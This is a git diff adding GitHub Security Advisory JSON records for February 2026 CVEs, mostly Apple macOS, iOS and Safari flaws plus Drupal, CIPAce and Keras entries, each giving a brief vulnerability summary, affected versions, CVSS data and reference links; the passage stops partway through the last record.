/dev/null +++ b/advisories/unreviewed/2026/02/GHSA-926h-3qgq-9w39/GHSA-926h-3qgq-9w39.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-926h-3qgq-9w39", + "modified": "2026-02-12T00:31:03Z", + "published": "2026-02-12T00:31:03Z", + "aliases": [ + "CVE-2025-46290" + ], + "details": "A logic issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.7.4, macOS Sonoma 14.8.4. A remote attacker may be able to cause a denial-of-service.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46290" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-934f-cmh4-43m7/GHSA-934f-cmh4-43m7.json b/advisories/unreviewed/2026/02/GHSA-934f-cmh4-43m7/GHSA-934f-cmh4-43m7.json new file mode 100644 index 0000000000000..b96bfe924a4f7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-934f-cmh4-43m7/GHSA-934f-cmh4-43m7.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-934f-cmh4-43m7", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20628" + ], + "details": "A permissions issue was addressed with additional restrictions. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3. An app may be able to break out of its sandbox.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20628" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126351" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126352" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-946c-234f-fccx/GHSA-946c-234f-fccx.json b/advisories/unreviewed/2026/02/GHSA-946c-234f-fccx/GHSA-946c-234f-fccx.json new file mode 100644 index 0000000000000..043ab44074113 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-946c-234f-fccx/GHSA-946c-234f-fccx.json @@ -0,0 +1,49 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-946c-234f-fccx", + "modified": "2026-02-12T00:31:05Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20653" + ], + "details": "A parsing issue in the handling of directory paths was addressed with improved path validation. This issue is fixed in macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3. An app may be able to access sensitive user data.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20653" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9677-7r6g-3qh2/GHSA-9677-7r6g-3qh2.json b/advisories/unreviewed/2026/02/GHSA-9677-7r6g-3qh2/GHSA-9677-7r6g-3qh2.json new file mode 100644 index 0000000000000..bc37631b43820 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9677-7r6g-3qh2/GHSA-9677-7r6g-3qh2.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9677-7r6g-3qh2", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20640" + ], + "details": "An inconsistent user interface issue was addressed with improved state management. This issue is fixed in iOS 26.3 and iPadOS 26.3. An attacker with physical access to iPhone may be able to take and view screenshots of sensitive data from the iPhone during iPhone Mirroring with Mac.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20640" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-96rf-whf9-r5vh/GHSA-96rf-whf9-r5vh.json b/advisories/unreviewed/2026/02/GHSA-96rf-whf9-r5vh/GHSA-96rf-whf9-r5vh.json new file mode 100644 index 0000000000000..8ca1f4404f2fc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-96rf-whf9-r5vh/GHSA-96rf-whf9-r5vh.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-96rf-whf9-r5vh", + "modified": "2026-02-12T00:31:03Z", + "published": "2026-02-12T00:31:03Z", + "aliases": [ + "CVE-2024-50619" + ], + "details": "Vulnerabilities in the My Account and User Management components in CIPPlanner CIPAce before 9.17 allows attackers to escalate their access levels. A low-privileged authenticated user can gain access to other people's accounts by tampering with the client's user id to change their account information. A low-privileged authenticated user can elevate his or her system privileges by modifying the information of a user role that is disabled in the client.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-50619" + }, + { + "type": "WEB", + "url": "https://cipplanner.com/cve-2024-50619-cve-public-notification-of-resolution" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T22:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-99pv-pwgp-5cm5/GHSA-99pv-pwgp-5cm5.json b/advisories/unreviewed/2026/02/GHSA-99pv-pwgp-5cm5/GHSA-99pv-pwgp-5cm5.json new file mode 100644 index 0000000000000..52700cc3d4f3c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-99pv-pwgp-5cm5/GHSA-99pv-pwgp-5cm5.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-99pv-pwgp-5cm5", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2025-46303" + ], + "details": "The issue was addressed with improved bounds checks. This issue is fixed in macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, macOS Sonoma 14.8.4. A malicious HID device may cause an unexpected process crash.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46303" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9mhv-cw55-h9jp/GHSA-9mhv-cw55-h9jp.json b/advisories/unreviewed/2026/02/GHSA-9mhv-cw55-h9jp/GHSA-9mhv-cw55-h9jp.json index ccf597961ccf2..fa1762e2080f0 100644 --- a/advisories/unreviewed/2026/02/GHSA-9mhv-cw55-h9jp/GHSA-9mhv-cw55-h9jp.json +++ b/advisories/unreviewed/2026/02/GHSA-9mhv-cw55-h9jp/GHSA-9mhv-cw55-h9jp.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-9mhv-cw55-h9jp", - "modified": "2026-02-04T21:30:32Z", + "modified": "2026-02-12T00:31:02Z", "published": "2026-02-04T21:30:32Z", "aliases": [ "CVE-2026-0945" ], "details": "Privilege Defined With Unsafe Actions vulnerability in Drupal Role Delegation allows Privilege Escalation.This issue affects Role Delegation: from 1.3.0 before 1.5.0.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-267" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-04T21:15:58Z" diff --git a/advisories/unreviewed/2026/02/GHSA-9rvp-ph3g-jg82/GHSA-9rvp-ph3g-jg82.json b/advisories/unreviewed/2026/02/GHSA-9rvp-ph3g-jg82/GHSA-9rvp-ph3g-jg82.json new file mode 100644 index 0000000000000..cca621e5888f7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9rvp-ph3g-jg82/GHSA-9rvp-ph3g-jg82.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9rvp-ph3g-jg82", + "modified": "2026-02-12T00:31:03Z", + "published": "2026-02-12T00:31:03Z", + "aliases": [ + "CVE-2025-43537" + ], + "details": "A path handling issue was addressed with improved validation. This issue is fixed in iOS 18.7.5 and iPadOS 18.7.5. Restoring a maliciously crafted backup file may lead to modification of protected system files.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-43537" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-c5gm-v7v7-vjx9/GHSA-c5gm-v7v7-vjx9.json b/advisories/unreviewed/2026/02/GHSA-c5gm-v7v7-vjx9/GHSA-c5gm-v7v7-vjx9.json new file mode 100644 index 0000000000000..a1ec15ef90a82 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c5gm-v7v7-vjx9/GHSA-c5gm-v7v7-vjx9.json @@ -0,0 +1,49 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c5gm-v7v7-vjx9", + "modified": "2026-02-12T00:31:05Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20660" + ], + "details": "A path handling issue was addressed with improved logic. This issue is fixed in macOS Tahoe 26.3, macOS Sonoma 14.8.4, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3, Safari 26.3. A remote user may be able to write arbitrary files.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20660" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126354" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cm39-88fp-pv6j/GHSA-cm39-88fp-pv6j.json b/advisories/unreviewed/2026/02/GHSA-cm39-88fp-pv6j/GHSA-cm39-88fp-pv6j.json new file mode 100644 index 0000000000000..2318643dfd18f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cm39-88fp-pv6j/GHSA-cm39-88fp-pv6j.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cm39-88fp-pv6j", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20624" + ], + "details": "An injection issue was addressed with improved validation. This issue is fixed in macOS Sequoia 15.7.4, macOS Tahoe 26.3, macOS Sonoma 14.8.4. An app may be able to access sensitive user data.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20624" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cpw4-rfmm-h598/GHSA-cpw4-rfmm-h598.json b/advisories/unreviewed/2026/02/GHSA-cpw4-rfmm-h598/GHSA-cpw4-rfmm-h598.json new file mode 100644 index 0000000000000..6cbbb73bef103 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cpw4-rfmm-h598/GHSA-cpw4-rfmm-h598.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cpw4-rfmm-h598", + "modified": "2026-02-12T00:31:05Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20676" + ], + "details": "This issue was addressed through improved state management. This issue is fixed in iOS 26.3 and iPadOS 26.3, Safari 26.3, macOS Tahoe 26.3, visionOS 26.3. A website may be able to track users through Safari web extensions.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20676" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126354" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f24m-jwf4-xpxc/GHSA-f24m-jwf4-xpxc.json b/advisories/unreviewed/2026/02/GHSA-f24m-jwf4-xpxc/GHSA-f24m-jwf4-xpxc.json new file mode 100644 index 0000000000000..c1cb0a29e8628 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f24m-jwf4-xpxc/GHSA-f24m-jwf4-xpxc.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f24m-jwf4-xpxc", + "modified": "2026-02-12T00:31:03Z", + "published": "2026-02-12T00:31:03Z", + "aliases": [ + "CVE-2025-43403" + ], + "details": "An authorization issue was addressed with improved state management. This issue is fixed in macOS Sequoia 15.7.4, macOS Sonoma 14.8.4. An app may be able to access sensitive user data.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-43403" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f3h2-q66h-c9wp/GHSA-f3h2-q66h-c9wp.json b/advisories/unreviewed/2026/02/GHSA-f3h2-q66h-c9wp/GHSA-f3h2-q66h-c9wp.json new file mode 100644 index 0000000000000..c433a2c029b81 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f3h2-q66h-c9wp/GHSA-f3h2-q66h-c9wp.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f3h2-q66h-c9wp", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20648" + ], + "details": "A privacy issue was addressed by moving sensitive data to a protected location. This issue is fixed in macOS Tahoe 26.3. A malicious app may be able to access notifications from other iCloud devices.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20648" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f7qx-wh9j-7278/GHSA-f7qx-wh9j-7278.json b/advisories/unreviewed/2026/02/GHSA-f7qx-wh9j-7278/GHSA-f7qx-wh9j-7278.json new file mode 100644 index 0000000000000..c864305b67c01 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f7qx-wh9j-7278/GHSA-f7qx-wh9j-7278.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f7qx-wh9j-7278", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:03Z", + "aliases": [ + "CVE-2025-46301" + ], + "details": "The issue was addressed with improved bounds checks. This issue is fixed in macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, macOS Sonoma 14.8.4. A malicious HID device may cause an unexpected process crash.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46301" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fqf2-x743-9564/GHSA-fqf2-x743-9564.json b/advisories/unreviewed/2026/02/GHSA-fqf2-x743-9564/GHSA-fqf2-x743-9564.json new file mode 100644 index 0000000000000..9d506fd02037f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fqf2-x743-9564/GHSA-fqf2-x743-9564.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fqf2-x743-9564", + "modified": "2026-02-12T00:31:05Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20662" + ], + "details": "An authorization issue was addressed with improved state management. This issue is fixed in macOS Sequoia 15.7.4, macOS Tahoe 26.3. An attacker with physical access to a locked device may be able to view sensitive user information.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20662" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-frmq-2cmp-gh32/GHSA-frmq-2cmp-gh32.json b/advisories/unreviewed/2026/02/GHSA-frmq-2cmp-gh32/GHSA-frmq-2cmp-gh32.json new file mode 100644 index 0000000000000..10c03b5141585 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-frmq-2cmp-gh32/GHSA-frmq-2cmp-gh32.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-frmq-2cmp-gh32", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20606" + ], + "details": "This issue was addressed by removing the vulnerable code. This issue is fixed in macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, iOS 26.3 and iPadOS 26.3. An app may be able to bypass certain Privacy preferences.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20606" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g32q-3228-m26p/GHSA-g32q-3228-m26p.json b/advisories/unreviewed/2026/02/GHSA-g32q-3228-m26p/GHSA-g32q-3228-m26p.json new file mode 100644 index 0000000000000..ed356d39b51f1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-g32q-3228-m26p/GHSA-g32q-3228-m26p.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g32q-3228-m26p", + "modified": "2026-02-12T00:31:03Z", + "published": "2026-02-12T00:31:03Z", + "aliases": [ + "CVE-2025-43417" + ], + "details": "A path handling issue was addressed with improved logic. This issue is fixed in macOS Sonoma 14.8.4. An app may be able to access user-sensitive data.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-43417" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gfmx-qqqh-f38q/GHSA-gfmx-qqqh-f38q.json b/advisories/unreviewed/2026/02/GHSA-gfmx-qqqh-f38q/GHSA-gfmx-qqqh-f38q.json new file mode 100644 index 0000000000000..6c5d21dcf11a0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gfmx-qqqh-f38q/GHSA-gfmx-qqqh-f38q.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gfmx-qqqh-f38q", + "modified": "2026-02-12T00:31:03Z", + "published": "2026-02-12T00:31:03Z", + "aliases": [ + "CVE-2026-1669" + ], + "details": "Arbitrary file read in the model loading mechanism (HDF5 integration) in Keras versions 3.0.0 through 3.13.1 on all supported platforms allows a remote attacker to read local files and disclose sensitive information via a crafted .keras model file utilizing HDF5 external dataset references.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1669" + }, + { + "type": "WEB", + "url": "https://github.com/google/security-research/security/advisories" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-73" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-h6jx-x5f4-qmj9/GHSA-h6jx-x5f4-qmj9.json b/advisories/unreviewed/2026/02/GHSA-h6jx-x5f4-qmj9/GHSA-h6jx-x5f4-qmj9.json new file mode 100644 index 0000000000000..6f87148c28743 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h6jx-x5f4-qmj9/GHSA-h6jx-x5f4-qmj9.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h6jx-x5f4-qmj9", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20623" + ], + "details": "A permissions issue was addressed by removing the vulnerable code. This issue is fixed in macOS Tahoe 26.3. An app may be able to access protected user data.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20623" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hjj6-wmh2-qhwj/GHSA-hjj6-wmh2-qhwj.json b/advisories/unreviewed/2026/02/GHSA-hjj6-wmh2-qhwj/GHSA-hjj6-wmh2-qhwj.json new file mode 100644 index 0000000000000..618359bd937ba --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hjj6-wmh2-qhwj/GHSA-hjj6-wmh2-qhwj.json @@ -0,0 +1,53 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hjj6-wmh2-qhwj", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20635" + ], + "details": "The issue was addressed with improved memory handling. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3, Safari 26.3. Processing maliciously crafted web content may lead to an unexpected process crash.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20635" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126351" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126352" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126354" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hr8m-gc74-4f7w/GHSA-hr8m-gc74-4f7w.json b/advisories/unreviewed/2026/02/GHSA-hr8m-gc74-4f7w/GHSA-hr8m-gc74-4f7w.json new file mode 100644 index 0000000000000..83dc0c2bdad5b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hr8m-gc74-4f7w/GHSA-hr8m-gc74-4f7w.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hr8m-gc74-4f7w", + "modified": "2026-02-12T00:31:03Z", + "published": "2026-02-12T00:31:03Z", + "aliases": [ + "CVE-2026-20603" + ], + "details": "This issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Tahoe 26.3. An app with root privileges may be able to access private information.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20603" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hx52-r225-3pxc/GHSA-hx52-r225-3pxc.json b/advisories/unreviewed/2026/02/GHSA-hx52-r225-3pxc/GHSA-hx52-r225-3pxc.json new file mode 100644 index 0000000000000..c0d35398f16d8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hx52-r225-3pxc/GHSA-hx52-r225-3pxc.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hx52-r225-3pxc", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20614" + ], + "details": "A path handling issue was addressed with improved validation. This issue is fixed in macOS Sequoia 15.7.4, macOS Tahoe 26.3, macOS Sonoma 14.8.4. An app may be able to gain root privileges.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": 